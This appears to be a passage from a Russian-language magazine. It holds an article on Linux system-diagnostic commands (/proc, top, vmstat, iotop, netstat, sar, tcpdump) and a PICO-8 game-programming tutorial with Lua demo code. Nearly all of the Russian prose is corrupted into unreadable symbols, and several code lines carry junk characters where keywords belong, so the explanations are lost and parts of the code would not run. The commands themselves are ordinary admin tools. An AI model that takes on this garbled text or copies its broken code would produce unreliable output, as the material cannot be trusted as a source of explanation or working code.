/proc,�??�???�??�????,��?????�?????�??�??�??�???�??�???????�??
??????�??� ???????�??� ??� ????� ?� ?????,� ?� ??� ????�?� ??� ???�??�??.� ?????
????,�???�?�??�??�??�???�???��??�??�???�????�??�??�???�???�?????�
??�?�?????�???,�???�?�????�???�??????�??�?�?燩ID???.
?� ??????�?� ???�???� ?� /proc� ????�?????� ???� ????�?� ?� ????�?� ???�??,
?????�????�??????�??��????�??�??�??�????�??�???,�?????��???�
???� ???�??.� ?� ?????�??� ???�?� ??� ????�????�?� ?� ?????�?,� ?� ???�????�???
??????� ?????�?� ???????�??� ????� ??� ?� ??????� ?� ??????�??� ???�????� ????�
????,� ???????� ?� ????� ??� ???�?� ????� ??� ??????�?????� ???� ???�?????�??
??????�?� /dev.� ???� ?� ?????�???� /sys� ??� ???�?� ?????�??� ?????�????� ???????�
???��?�???�?�??�??�???�???�??,�?�??�????�???�?�??�???�???�???�
????�??�???�??�???�??�???�????�(??????�??爑dev,�??????��??�???�?
?????�????�?????�?�/dev�?�???�?�??????�??�?�/sys).
?� ???�?� ????� ???????�??� ??� ???� ???� ???�???�???� ?� /proc� ?� /sys� ????�?
??????,� ???,� ????� ????????� ???�?� ??� /proc,� ???�?� ???�???� ??????�??� ????�
?????�???�??� ???�?????� ???�????�?� (??????!),� ???????� ??� ???� ???
??�?????�???.
??��??�???� /run,�????�?�?.�??�??�????�??�???,�??????�??�????�
????� ?????� ??� ???�??� ?� ???�??� ??????�??�??� ???�???� ???� ???�??� ???�??�?
????????�??�?????�??????,��??�???�?爑dev�爏ystemd�(?�??�?????�??
??????�?� ????� ???�?).� ????�?,� ???� ???�??� udev� ?� 2012� ????� ????�?� ?� systemd
?�???�?�??�???�???�??�??�????.
?�????,�??�????�????�??�???,牜???�?????�??��?????�??�.
??��??�??�?�???????:燩rocfs燼nd爏ysfs�牜???�????�??�???�/proc�.
??� ???�????� ?� ?????� ???????.� ???� ????� ???�?� ????�???,� ?????� PID� ?????�
?????� ???�??�??,� ????� ?????�?� pidstat� ?� htop� (??� ????�???�???� ??????,
?????�???�??????�??�??爐op,�???�?�?????�???�??�???�???�?�??�?,�???�
???�??�????�???�??�????�?�????).
???�?�???,�????�?爐ime�??�???�?�????�???�??�???,�????�?�???�??
???�?�??�???????????,�??�??,�????�??�??�???:
$ time python3 -c "import time; time.sleep(1)"
python3�c�"import爐ime;爐ime.sleep(1)"�04s爑ser�01s爏ystem��
cpu�053爐otal
???� ????� ?� ???� ???�???�??�?,� ?????� ????�????� ?????� ???�?????� ???�??
???�?�爇ernel爏pace�爑ser爏pace,�?�???�????�??�?????��???�??�???
????�???�??� ???.� ?????�?� ???� ???????� ?????�?� ??� ???� ???�?� ???�?
?� ??????�??� ???�???� ???� ???�???� ?????� ??� ?????� ???�?� ?� ????�????:� ????
???�??� ??????�???� ????�?� ????,� ??,� ????�?� ???�????,� ?????� ?� I/O,� ?� ????
???�??� ?� ??,� ???�????,� ?� ????� ????� ????�?????�?� ???????�??� ???�?,
???????�??�?�??�?????�?????�??�?????.
?� ???� ??????� ???�?,� total� time,� ???� ??� wall� clock� time� ???� real� time,� ?
???�??�?,�??????�????�?�?????�????�????�???�????��????�?�?????�
??� ??� ?????�?� ???�??�?� ???????�??.� ????�?,� user� time� ?????� ????� ????�?
????�?� real� time,� ??????� ???� ???� ???�??�???�???� ???� ???�?� ??� ????� ?????
CPU.�???�????�??�???�??��??�??,�???�????�??�???�????�????�?.
??� ?� ?????�????,� ???�?� ???�??????� ???�????� ???� ???�???� ????� ?� ???????�
???�?,�??�?�?????�?????�??�????�????�?:
$爉pstat�P燗LL�
??�?� ?????� ????�??� ??????�?� ?� ???�????� ????� ?� ???�??,� ????????� ??� ?????�
????,�??�????,�????�????�?�???�?�??�?.��??�??�?�??�??牜???????????
???��????�?�.
???????,�??��??????�????
???��????,�??��???�????�?�???�??�??�?�??�???�?�???��?�?牜?????�
????粻?�???�?�???�?�??�????��???�???�?,�???????�?,�???�??�??�??.
???�?????,�??�???�???�?��??�????,��???�???�??�??�??????�??????�
??� ?????�?� ?� ????????:� �?� ????� ???� ???�?� ???�?,� ??� ???� ???�?� ??????�.
?� ?????� ??????�?,� ???�?� ???�??�?� ???�???�???,� ???� ???�??� ???�???� ???????�
????� ????�??�?� ???�??� ???�????,� ???�??,� ???� ???�???� ???�?� ???� ???
???????�??�??�?????�??�????�??
????�?,�?�??�????�?.�??�???�?�??��??�?????,�?�?�????�??�??
?????�????�?????�?�???�???????��/proc:
$ cat /proc/meminfo
??�???????�???�??�??�???,�?�??????�???�??�????�???�??�?�???????�
??,� ???� ???� ???� ????�?� ???� ???????�?� ?????� RAM,� ???????� ?????� ????.
?????�?�??�?�???????�?????�?????�??�??�??�??�????�?爁ree:
$ free -ht
????�?,� ??????� ??� ??????�?� ???????�??� ??� ???�????�?� ??� ??� /sys,� ???� ?
???�??� ??� ????�??� ??� ??????� ???� �????� ??,� ???� ??????�.� ???� ????�?
??�??????�?,��??????�?????�?,�??�??�?????��/sys��??��??�???????:
How� memory� is� represented� in� sysfs.� ????� ????�?� ?� ???�??�?� ?????�?????
?�??��?????�???�??�??�??�??.
???� ??� ?????�?,� ????� ???�???????� ????????� ?� ?????� ???�?????�????
???????�??� ??� ???�????�?,� ???� /proc/meminfo.� ???� ???�???� dmidecode
??� ????�???�???� ??????.� ???� ????�???� ?????�???�???�?� ?� BIOS� ?� ???�???�
????�???�??�?�??�????????�???�???�??.�???�?,�?�???�?�??�??�(????�
???�?� ??????� ?????�???� ??� ???� ?????�??????,� ??� ???� ???�??� ???�??� ?????�
???).
$爏udo燿midecode�?type�
????�?,� top� ?� htop,� ???� ?� ??????�??� ps� aux,� ????� ???????� ???????�??
?� ???????� ??????,� ?� ???�??� ???� ?� ????�????� ?� ASCII� ????�?� ??� ???� ?� ??
?????.�???�??.�?????.
top
htop
???�??�??�????�?�??�??�?:
? PID��???�?????�??�??�??�??
? User��???�???????,�?�?????�?�?�??????.
?� ???� ???� ???�?????� ????� ????�??�??:� Priority� ?� Niceness,� ???�??� ???�??
?� ?????� ???�??� ???�?� ???�??� +� 20.� ??� ????,� Priority� ??????�???� ????�??�??
???�????�??�??�???�??�??�?��???,�燦iceness�?????�???�??�????�????�
??????�?�???�(????�???�?�??�???�???�?�???�????).�???�????�??�???�
???� ???�???�???� ???� ??????� ???�??�?� ????�??� ???�??�????�?� ???�???,
?????�?,� ???�???�?� ??????,� ???� ???�???�??� ???�??�???� ?????�??� renice
???�?�??�?????�???????????�???�?燙PU?bound�?????�????�???�?�?????�
??�??�???.�??�??�??�??�????�???�??�???��????�?燩riority�????�??�??
rt,�?�???爎eal爐ime,牜???�???�?��??�??�?�.
????�?�??�???�??�??��?????:
? VIRT��??�????�??�?????,牜???�??�??粻???�??�?�??�?????
? RES� ?� ???�????�?� ??????�?????� ??????� (????�?,� ???�???�?� ???????�?
copy?on?write�????�???�??�???�?�(N)�??�??�???�?��???�?�??�??�?
?�????��??�?�??�??燤��???�????�?,�??�??�?�?�??�??,�??�???�
????燦*M�?????,�?????�??�??�??�???�?�?�??�?�????)?
? SHR� ?� shared� memory,� ??� ????� ??????,� ???????� ?????�????�?� ?????
??????�?????�?�??�??�??�??�??�?�??�??�??�????.
??��??�??�??????�?????�???:
? CPU%� ?� ?????�?� ???�??�??� CPU� ????� ???�????� ???�?� ?????� ????� ?????�
??�0%,�???�????�????�?�?�??�???�?�????
? MEM%��??�???�?????,�??�????�???�??�??�???
? TIME+��????�?�??�???�??�???�?????
? COMMAND��????�????�?�(????�????�+�???�??�?)�?????�?.
??�?�?�????�???�??�???�?,�???�???�?�??�?????�??!
$爒mstat�
?????�???�??�?�??????,�??�???�???�????�??�?�?????:
? r��??�??�??�???�??�??�??�?�??�??��??????
? b��??�?�??�??�??�爑ninterruptible爏leep?
? si/so��????�?�???�??�?????��??????�?????�????�?��???�/�????�
????�?�??�?.
??�?�?�???�??�????�???,�??��??�??�??�???��??�??�??�???�????
??????????? ??????
?
? �?????�?????
?????
???????? ?�???????
???�?????�??,�??�?????????�
?�????燣INUX????????
???�??????�????????�???????�?????
??�?�?�???�??�??�????�???�?????�(???�????,�??�???�??�?燗rch燣inux),
??�????�???�??�??��????�??�????�??�???� fdisk.��?�??????�??�?
???�?�??�??????�??�???�?�???�????�??�?:
$ sudo fdisk -l
????� ??� ?????� ???�????�??� ???�??� ?� ????�????�????�??� ????????�??,
??????�???燾fdisk,��??�?�??�???�??�??,�??????,�?�??�??�?????,�????�
??� ????�?� ???????� ????� ?� ???�???�?� ?????????� ???�?????� ??� ???�??.
???� parted� (?� ??????�?,� ????�?,� ????� ???�????� GUI� ??� GTK� ?� ????� gparted)
?� gdisk.� ???????� ??????� ??????�?� ???�???� ?� ???,� ???� ?????�??�?� ???�???�?
????�????� ?????�?????�????� ???�????� ??� ???�?,� ?� ????�????�?� ???� ???�??
????�????� ??????�???????� ???�??� ????�????.� ?????�???� ??� ???� ?????�??
?????� ?????�????�?,� ???� MBR� ?� GPT.� ?� ??� ????� ???�????� ????�??�?????�?
??� ???�???�?,� ??� ????????� ???�?,� ???�????,� ?� ??????� �???�????� ?????�??
???�????� GPT� ?� MBR�.� ???� ???� ???????�???� ?� ???????� ???�???�?� Windows,
??� ????� ??� ???�?� ??� ????�???.� ?� ??,� ?� ???�????�??� ??� ????� fdisk� ???� ???�?
????????��??�??�???�???�?,�??�爌arted,�????�?�???????�??�?�?????�
??????�?�?�??�??�???�????�??.
??� ???�????� ?� ???�?� ???????�??.� ??� ???�?,� ?????� ?� ???� ???�???,
?� ??????� ?????� ?????�??� ??� ??????� ???�????� ???�???,� ???�??,� ???� ????
????�?????�?:
$ df -h
???��???�?,�h�??�???�???�?牜??????�??�??粻?????�??�????.�?��??�?
???�???,�??�???�??�??��??�??�?�??�??????�????�??燿u:
$ du -h /path/to/folder
??�??�???� ?????� ??????�??� ???�??� ??????�?:� �?� ???� ??� ??????�???,
???� ????� ?????�???� ???�?,� ?????� ????� ???�????�.� ???�?,� ?????� ????�????
????�??�?,�??�??�?????��??�????�??:
$爄ostat�xz�
???�????�?�??????�???�??�??�????�??????�??�??�????�??�?????????
???�???�???�??�?????�??��??�???,�???????�??????�??�??��????�?.
???� ????�?� �????�??粻 ???????�?,� ?????�?� ????� ???� ????� ?????�?
???� ????�????� ???�??�???� I/O� ???�????�??,� ?� ???,� ??� ???�????,� ??????�???
iotop.
$ sudo iotop
???� ?????�?� ?????�?� ???� ????� root� ???� ???�??� ?????� ????� ???????�???�?,
???,� ???,� ????� ????� ?????� ???� CVE?2011?2494,� ???????� ?????� ???�?????
?� ????�?� ?????�????�?� ???�??� ???�??� ??� ?????� ????�?????�??� ???�??,
�????�?�??�??????�?,�??�????,爏udo�.�??��??�?.
??????�????�??????
???�??�?�??�????�??�????????��??�???�????�??�???�?,�??????�???�
???�??�????.� ?????� ?????� ??� ???� ?????�?� ?� �??�????�??粻 ???�???� ?????�
????�?�?????��?????,�??,��????�??�???,�??�?,�?????�??�??????�???�
?????�?�???�?,��??�??��???�???�??�???�?�??�??�??.
???�??,�????�??�????�???�???�????�??�???��??�???�???????�??
???� ???�??� ifconfig?� ??� ???�????�??� ???�????� ifcon?g,� ???� ???�???,� ???
????�?�?????�??�?,�??�???
$ ip a
???�?� ???�????� ???�???� ??????�???,� ?� ???�?� ??� ??� ?????.� ????�?,
???� ???????�??� ??????�?� ???�???� ??� ???�???� ???�?� ????�?????� ???�???
?????� bridge?utils.� ???�?� ?� ???�???�?� ??????�?� ???�???� brctl,� ?� ???????
???????�??�?�????�?�???�????�???�(brctl爏how),�?��?????.�?�???�?
????�?� ??????�???.� ???� ?????�??�?� ???�??,� ???�?� ????�?� ????,� ?� brctl� ??
??� ??????�??.� ???�?????,� ???� ???� ??� ???�????� ??????�????�?� Open� vSwitch
?� ???�?????� ??????� ????,� ???� ???�???�?� ??????�?� ????� ?????� ???�??� ????�
????�� ovs?vsctl.�???�????��???�???�????�?燨penStack,�??�??�??�?
???????�?????�???�?,��????�???�????�?.
????�?� ?� ???� ???�??� ???�??� ???�??�???�???� ???,� ????????,� route�n?
???,� ????.� ???�??� ????� ??????�???�?� netstat� ?nr� ?� ip� route� show.� ??
?� ?????� ??????�??� ?� ???� ???�??????� ?????�??� ???�?� ?� ???�??�?,� ???????
??�??�??????�??�????,�??�??:
$ sudo netstat -tnlp
??� ?????,� ??� ???� ?????,� ???� ??????�????� ??� ????�???�???�?� ??� ?????.
?????� ???�?????� ??????� ?� ?????�??� ???�???,� ???� ??????� ????�?
??�???????�??.
$爏ar�n燚EV�
??,爏ar��??�??�???�???????�??�???�??�?????�??�?.�??�?�?????�???
??�???�?�??????�??�????,�?��??�?��?????????�??�??�???.�???????
?�??�?????,�??�????,��?????牜????�??�?????�???�??�???��??????
SAR�.
???�?爏ar�??�???�?�?????�???�????�??/???�????�????�????��??�???�
???�?� (???� ???�?????� ??????�?� ???� ??� ???�??,� ???�?� ???????� ???�???�????
???�?� ???� ???�???� ????�?� ???�?????�??,� ?????� ??????�?� ????�??�???)
?�????�??�??�???.
$爏ar�1燭CP,ETCP�
??� ?� ???�?????� ?� ?????�?,� ??� ?????�?,� ?� ??� ??� ???�????� ?� ???� ????�???
??????�?????�?�??�???.�???�??�?�??�??�?�?????�???�??�??�???:爐cp?
dump� ?� wireshark.� ???�??� ?� ???�???�??,� ??� ???�?,� ?� ???�???,� ?????�???
????�?????�??�?�???�???????�??��???????�??�??��????????��???�
????爌cap:
$ tcpdump -w test.dump
???�??�?��??�????�??.�?�??�??�?�??�?�??�?�????�???�???�??????�
???,��??�?�???�?�??????��??�??????�???�??�?,�??�??��??�??�???
???�???.��??�??????�?�??�????�??�?�?????燨SI�(???�??,燭CP/IP).
Wireshark
???? ???? ???????? ?????? ? ??????? ??
??????????!
????� ??� ?????� ????�??� ?� ??????�??� ???�????� ???�?????,� ???� ???�???�??
?�??�???,��??�??�??????�??�?????�???.�??� ???�??�?�???????��??,
?????� ???�???� ????�???�?� ?� ??????�?� /var/log� ?� ????�?� ???� ???� ?????�?.
??�????�???�??�???�???????�??????�??�?????�????�??爏yslog,�???�
???,� ???� ????�?????�?� ???�????�??� ?????�????� rsyslog.� ???� ??� ???� ???
???????� ??????�???�?,� ????� ????�??�?� ????????,� ???� ???� ???,� ?� ???�?� ????�
????,�??�????,�?�?.
?�??��???�?????��??�????�??�??�??�???�??燣inux�?�???�?爏ystemd
??????�???�?� ????� ????????� ??????�????,� ???????� ???�?� ?????????� ?????
???�???� journalctl.� ???� ????� ????�?� ????�??� ????�??�??� ??� ???�??� ????????�
???��??�??�???�?.�???�?�?�??????�????.
???� ??� systemd� ??� ???� ???� ????�???� ??????�?� ???�??� ???????
???� ???????�??,� ???�???�?� �??�???�?粻 ???� ????� ???�??� ????�???�??� ????�
???�??�?� ?� ???�??�????�?� ???�??�?????� ?� ?????�??�???� ??????�?.� ????�
?????,� ???� ?????�???� ????????� ???�???� ???????�??� Crontab?� ???�?� ??� ????�
??????�?,� ??????� ?� ???� ????� systemd� timers.� ?� ???� ???�??� ???�???�?� ????�??
??� ???�?????� ?� �????�??粻 ????????� ?� systemd� ????� ???�??�??� watchdog.
?�??�??�?�??�??�??�?��??�??�??�??燾hroot?�????�?????�?,�?????
????�?????�??爏ystemd?nspawn.
??????????��??�????�?????
???�?�???�???��????�???�??�??�????,�???�?�??�?�????,�??�?�????,
???�??�?��??????�???�????�?��???�???�??�????.�????�???�??�???�?
???�???� ??????�??�?� ?� ???�??�???�??� ???�??� ??� ?????� ???�?� ???�???
?�??�????�???�???�?,�?�??�???????�??�?�?????�?�??�??�??�??�??,
??� ???�???� ??� ????� ?????� ????�????�?????� ????�???� ?� ????�?????
???????� ?� ???� ???�??� ????�??� ?????,� ???????� ???�??????� ??????� ??� ????.
??????,� ???� ?� ????� ??????� ????� ?????� ???�??�??�??� ???� ?????�??� ???????,
???�??
GEEK
PICO-8
??????��????
??�??????????
?????????,�??????
???????�?�???
????�??????
egordorichev@gmail.com
??�?� ??� ???�????????� ?????�?� ???�???� ????,� ??� ???�??,
???� ???� ???�????� ?� ???� ???�?� ???�???�?� ???�???� ?� ???.
??� ???� ????� ??� ????�?.� Pico?8� ?� ???�??� ???�????�??� ????�
?????�???� ?� ???� ?????�?� ???�???� ???�??� ???�???,� ???�?
????� ??????� ??� ?????�?� ?� ??????�?� ??� ???�?� ???�????� ????�
????�????.�????�??�?????�?燩ico?8�??�???,�??�?????�
??,�??��??�???�?�???�??�??,��?????�???�?�??�????
???�?,�??????�??�???�?��???.
?� ???????�?� ???�????�??� ???� ???�?????� ?????� ???,� ??� ????�??� ?????
??????� ???� ????� ???????� ???�?????�??� ?� ???� ???�????�??� ???�????�????.
????� ??� ??� ???�??,� ???� ???� ?????,� ??� ????�????� ???�????� ???�??� ????�????
???�????�???�????�??�?.�?,�??�????,燬uper燦intendo�??燴X燬pectrum.
??????�???�????,�??�???�?????�????�?�?�????�??�???��??,�??��??
????,� ?� ???� ???�????.� ??????� ?� ????� ?????�????� ?????�??� ????,� ?????�??,
????,� ???�????� ????????� ?� ????????�??� ???�??.� ??????!� ???� ?� ????� ??????
???�????�??�??�???.
??�?� ??� ???�??� (???� ????� ???�??)� ???�????�??� ????�????� ?� ???� Voxatron.
??� ???�?????� ???????�????� ????�?� ??� ???,� ?� ??� ????�??� ????� ?� Pico?8.
????�??�??�??????�?�??�????�??�???�??燰oxatron,�?�??�??�?�??�???�?
????�??,�??�?�???�?�????�????�??????�????��??�??�???�??�???�???,
?� ???????� ?� ?????� ???????.� ??� Pico?8� ???�?????�?� ?� ???�??� ???�????�??
???�???.� ?� ??� ????�?,� ????�?,� ????� ?� ???� (????�??� ?� ????� ??????�??�??)
???�??�爊eko8.
INFO
Pico?8� ???�?� 15� ???�????,� ??� ???�??� ???�?????�
???� ???�???� ???�??????�???�?� ???�???�?.� ????�
?????,� LIKO?12� ?� TIC?80.� ???� ???� ??????�?
?????,� ??� ????� ??� ?????�?� ????????� Pico?8,� ??
??�??�??�?�????�???.
???� ????� Pico?8� ?� ???� ??� �???� ?� ????�.� ?????�?� ??????�?� ??????�???�??
???�??� ???????�??� ????,� ???�?????� ???� ???�????�??� ???�???� ?� ?????
???????�??�??�??�???�????.�??�???�?????�???燙eleste.�?�??�??�???�
???�???�??�????�????�?????�?� ??燩ico?8�??�?�?�?????�??.�??�?�???�
???�??�??�????� ??�???�?� ?� Steam,� ???�?????�?� ??� ???� ???�????�??� ????�
????��??????�??�?????�??�???�?�??�????.
??????
???� ????�?� Pico?8� ?????� ???�??�??� ?� ???,� ????� ????????� ?� ???�????�?� ???,
???� ????�???�?� ??� ????� ??� Unity?� ???� ??� ?????�?,� ??????�?.� ???�???� ???�??
?????� ???�???� ???�?� ???� ???�????�?.� ??� ??????�??� ?????�????�????� Pico?
8�??�?�???�???��????�??�????�??�??�???�?????�??:
? ???�???�8�?�8�??�????,�??�????�???��??�???
? 32�????�??????
? ??�???�??�????�?????.
?�??�??�??�???,�?????�???�???�???�??�?�??�???�?????�??�?��??�???�
???� Lua� ?� ?????�??� ?????�???�?� ???�?� ????�????�???�??� ????�?� Pico?
8�???�???�?�???�????��??�????�?�??�???�?????�?.
??� ????� ?� ???�??� ??????.� ????� ??� ?????� ????�??� ?� ???�?????�??
???????�??�??????,�??????�??�????�?�92.�????��??�??�??,�??�???�
???��??�?�??�????�????�??�??�???�????�???�??.�??�??�???�??�???�
?????�� ???�??,�???�???�???�?????.��??�??�??�?�??�???�???�????
???????,�?燩ico?8�??�???�???�?�??�?,�??�?,�???�??,�???�?????��?????�
???� ????�?� (???� ???�???�?� ?????�?,� ??� ????� ????�?� ()� ???�?� ?� ????� ???
??????),��??�?�??�?�??�???�??.
??�???� ??� ??� ???� ???�?????�?� ?????� ???�???� ??????� ??� ???�?� ???�??
?� ???�??� ????�???�???:� ???�????� ??� ?????� ?????�???� ?????� 65� ?????� ????�
???.� ?� ????� ??????� ?????� ???????� ???� ????�???�???� ?� ????� ?????,� ??� ???
??????�??�????��?�????�???�?.
??��???�?��???????�???,�?,�?�??��??�??�?�??�?????�??�???�
????.� ???�?� ????� ???�????�?� ??????� ?� ???,� ???� ????�???� ????� ????�????
?� ???�????�??� ???�???,� ??� ?????�?� ??????� ????�???�??� ???� ?� ???�???�?
???�?????��??????�??�??�?????.
????�??�??�??�???�???� Dank爐omB,�??�?????� @krajzeg.�????�???�????
?????�???� ?� ???�????� ??� ????�?� ??????�??�??� ????�????,� ??� ?� ????� ???�??
???????,�????�??�?????�??�??�?,�??�???????�???�????,�??�?????�?,
???????�??�?�???�???�???�?�??�??�???...
?�????,�??�?�???�???,�??燩ico?8�?�???�???�?????�?�???�?????�???.
??�?�?????�??�??�???�??????�??�????�?��??�???�??�??.
?????????�??????????�?燩ICO-8
Pico?8�????�???�?��???�????��??�?�??????�??�?�???�?????.�???
??� ????� ???�??� ????�????????� ??????�?????� ?????�???� ????�?,� ?� ??� ??????�
?????�????�???�???�??��???�??�?.�?�??�?�?�??�??�??�??�???�???�
??�?�???????�????�??.
????,� ????�??????,� ???� ??� ?????� Pico?8� ??� ???�????�??� ???�?,� ???�??
?� ?????�??.� ????� ?????�???� ????�???� ???�??� ???�?????.� ??????� ???�???
help,�??�?�??�???�??�??�??�??�?????.
??????????? ?????????
???�??�??�??�??�??�?�?�??�???�?��??�????�??�??�?.�??�???�???�
?????�???� ???� ???�???� ???�???�??� ?� ???�??�??� (.p8)� ?� PNG� (.p8.png).
??�??�??�??�??�??�???�????�??�?�?�??�???�???�??????�??�???�?
?�????�??�??�????�??�???,��?�??�????�???�??�???�?.
??�???�???�?�???�???�??�??�??�????�(??�??�??�?????�?�??�?)��???�
??????��???,�?�????�?�?????�??�?????�?�燩ico?8��????�???�???.
???�????�??�??�???�??�??�????�????!
??�??�???�????�??�???�?�????:
install_demos
cd /demos
ls
INFO
??�??� ???�?� ???�?� ???????� ?� ???�????� ??????�
????�?�??�???�?燩ico?8,�???�???????� fold?
er.
?� ???�?� ?� ???�???�???� ??????�?� ???�??????� demos/,� ?� ???????� ?????� ????�
????�?�??�????�??�???�??.�????�??�????�??�????爅elpi.p8.
load jelpi.p8
run
????�?,� ???�?� ???�??� ?????�???� ???�????�??� ???�????,� ???�????�?� ??????
Ctrl?R.
Pico?8�??�????�???�?�??�?�??�??�??????�??,�??�??????�??????�????�
??� ???�????.� ????�?� ???� ????�??�?,� X� ?� Z/C.� ???�?� ????�?????� ?????�????
????�????�?�??�???�?,�??�?�?????燛scape.
??�???�?????�???�????�???�??�??!�????�??�????牜???�????粻???�?
????�????�?.� ??� ??????� ???�?????� ????� Escape� ?� ??????�?� ?� ?????
?????�?????�??� ???�????�???� ???�???�?� (???�?� ?????�?????�?� ???????,
???�?�??燛scape).
??�????�???�???�????�??.�??�????,��?????�???�???�??????�??:
??燾onfig:爊um_players�r�num_players��corrupt_mode�爁alse
max_actors��8
??�??�???�??�??�????� corrupt_mode�?� true��????�??�??�????�????!
???�?,�????,�?�??�??�?????�??�??????�??...
????� ????� ???�?????�?� ??� ????�???�???�?.� ??????� ?????�???� ????,
???�?� ??????�?????� ?� ???� ??????�??� ?� ?????�????� ?????�?� ?� ???�???
?????�?�???,�??�?,�?????��??�?.�?????�?????�??,�??�?????�??!
PocketCHIP
???�????�?�?�??�燩ico?8�??��?�???�?????�???�??????�??�??�?,�?
???�?????�?� ???�?� ???�???� ???�?????� ????�????� PocketCHIP.� ????
????????�??� ?????�???� ?� ????�??,� ???�??�???� ???�????�??� ?� ???????�??
???�????�???� ???�?� ?� Pico?8,� ???� ???�???�?� ??????� ???� ??????� ?� ????,� ????
??�???��?????.
???,� ?� ???�??????� PocketCHIP,� ??????,� ????????� ?????�???:� ???�???� ???
?????�???� ???�?????� ?????� ??????,� ?� ??????� ????�???� ??????�?� ?� ???�?
?????�????.�??�??�??????�????�??�?�??�??�??�?�??�?�??�?�??�???�
???�??�?.�????�???�??�?,�??�???�???�????�??�?!
??????????? ??????
?
? �?????�?????
GEEK
PICO-8
??????��????�?�??????????
?????????,�??????�??????�?�???
????????
??�???,� ??� ?????� ???�???�?� ??� ???�????�?,� ??????� ?????� ???�???�?
??????????� ????!� ?� ???�?� ?????� ??????�??� ???�????�??� ?????�????�?,� ???
???�???????�??�????�??�????�?�???�?�?�??.
???�??��???�?????�???��??�?.
??�???� ???�????,� ???� ???� ????� ???�???.� ???�?� ???�???� ?????� ???�????,
??????�??�????�?爎eboot�爏ave爉ycart_.
??�??� ???�??� ?� ????�???:� ?� Pico?8� ????� ??????� ???�????�??� ???�???,
???????� ?????� ????????�?� ?� ????�???�??�???� ????�???,� ????� ???� ????�????�
??:
? _init�?????�???��????�?????,�??�?�??�????�????
? _update�?????�???�??�??�???�????燺draw,�???�???�?�??????
? _draw�?????�???�??�??�???,�???�???�?�???�??�??
? _update60��??�??� _update,�?,�???�??�???�???�?,�??�????�????
????????�?�爁ps�(????�?��???�??�???).
??�???�??�????�????�??�?�??�???�???��???�???�????.
???� ???�??� ????�???� ???�???�?� (???�????�??� ??� ???�???,� ??� ?????�?
????�???�?��????�??燩ico?8).
function _init()
str="hello, world!"
t=0
end
function _update()
t+=0.01
end
function _draw()
cls()
local y=cos(t)*16+64
print(str,10,y)
end
???�??� ??????�??:� ???�???�??�????�??� ???�???� ?� Pico?8� ??????�?
?�????�???�?�???�?�??�???,��?�?�???�?�?.
WWW
???,� ???� ??� ???�??� ?� Lua,� ????� ??????�?????
??????�???�??� ????�??� ??????� Learn� Lua� in� 15
Minutes.
??�??� ???�????� ????� ???�??� ???�???�??�??� ?� ???�????� ???�?� ???�???�?
??�??�?.
function _draw()
cls()
local x=cos(t)*32+64
local y=sin(t)*32+64
circfill(x,y,3,8)
end
???�??�?�??????�??�??�?�燩ico?8�??�?�??�???�????�?????�????,�?
????� ???????� RGB� ?� ???� ?????� RGBA� ?????� ?� ??� ???�??.� ???�???� ???�?
??�?��???�???�??�?�???,�??�????��???�??.
??�?�??�?�?????,��?????�??�?!�????�??????�??:
??�燺init()
cnt=10
??�燺draw()
cls()
for i=1,cnt do
local a=t+i/cnt
local d=32+sin(t+i%2*0.5)*20
local x=cos(a)*d+64
local y=sin(a)*d+64
circfill(x,y,3,8+i%2)
end
???� ??� ???�?� ???�??�?,� ????�???� ???� ???�????� %� ???�??�???� ????�??
??�??????.�??�????�2��
???�??�???,�??�????�??�?�?�??�?????�??�??????�?,�????�??�???
????�??�??�?��???�??�???,��??�??���??�??.
local m=(i%2==0 and 1 or -1)
local a=(t+i/cnt)*m
?� ????????� ???�?� ??� ???�????� ???� ?????�??,� ???� ???�??????�???.� Pico?
8� ????????� ??� ??� ???�?,� ??� ???� ?� ??� ???� ????�?� ?????�???.� ?????� ???�????
???�???� shp(),� ???????� ?????� ???�?????� ????�?????� ??????,� ???????�??
???�??,�???�?,�???�?????�?��???:
function shp(x,y,cn,r,a,c)
color(c)
for i=1,cn do
 local an=a+i/cn
 local oan=a+i/cn-1/cn
 line(cos(an)*r+x,sin(an)*r+y,
  cos(oan)*r+x,sin(oan)*r+y)
 -- line(x1,y1,x2,y2,c) draws a line from (x1;y1) to (x2;y2) in color c
end
end
??�燺draw()
??�??????�????燾irc()�?�???�??????:
shp(x,y,6-i%2*2,16,t+i/cnt,8+i%2)
??�?????????�?????�??????�?�????????爄
??�?��??????�????????�?????:
local ox,oy=calc((i/cnt+t*2)*m,8)
circ(x+ox,y+oy,4,9+i%2)
??�???�???�????�?????????�???�???????�?????
???�???!� ????�??,� ????� ????� ???�????�?.� ???� ??????,� ????� ???�????.� ???
???�??� ???�??� ????,� ????�?� ????�???�????�??� ?� ??????�??�??.� ?� ???�?
???????� ???�???� ???�??� ????????,� ??� ???� ?????� ????�??,� ??????� ???
????????�?,�??�??�?????�?.�?)
function _init()
t=0
cnt=10
end
function _update()
t+=0.01
end
function _draw()
cls()
for i=1,cnt do
 local m=(i%2==0 and 1 or -1)
 local a=(i/cnt+t)*m
 local d=32+sin(t+i%2*0.5)*20
 local x,y=calc(a,d)
 x+=64
 y+=64
 shp(x,y,6-i%2*2,16,t+i/cnt,8+i%2)
 local ox,oy=calc((i/cnt+t*2)*m,8)
 circ(x+ox,y+oy,4,9+i%2)
end
end
function calc(a,d)
return cos(a)*d,sin(a)*d
end
function shp(x,y,cn,r,a,c)
color(c)
for i=1,cn do
 local an=a+i/cn
 local oan=a+i/cn-1/cn
 line(cos(an)*r+x,sin(an)*r+y,
  cos(oan)*r+x,sin(oan)*r+y)
end
end
TWEET燡AM
?� ????�??�?� Pico?8� ?????�??�?� ????�??�??� ???�??� ???� ???�????� ???�????�
???� ?� tweet� jam.� ??� ????,� ???� ???�???�?� ???�??� ????�???�?� ?� 280� ???�??
(?????�???�???,�?�??????�????�#tweetjam��#tweetcart,��?????�?�???�?
???�????� ???).� ??????� ???,� ?� ???� ????�?� ???�??� ???�?� ????�???� ???�?????
???�???�????�?????�??!�??�??�???�?�??�????.
??�???�?�???.
poke(0x5f2c,7)t=0pat={1,2,4,8,9,10,15,7}cls()function _draw()camera()
for i=1,500 do circ(rnd(64),rnd(64),1,0)end camera(-64,-64)t+=0.001
for i=1,130 do a=t+i/5000 x=sin(33*a)*cos(9*a)*64 y=sin(40*a)*sin(7*a
)*64 circfill(x,y,3,pat[mid(0,#pat,flr(i/20))+1])end end
??�???�?燖guerragames.
t=0 ::_:: t+=.001
cls(7) for p=0,1,.0005 do d=.7*p a=d*cos(p*t*8+t*10)+p*sin(t*10)-t*10
r=p*128 x=r*cos(a) y=r*sin(a) circfill(x+64,y+64,1+.9*sin(p*t+a*t*6),
0) end flip() goto _
??�???�?燖SeanSLeBlanc.
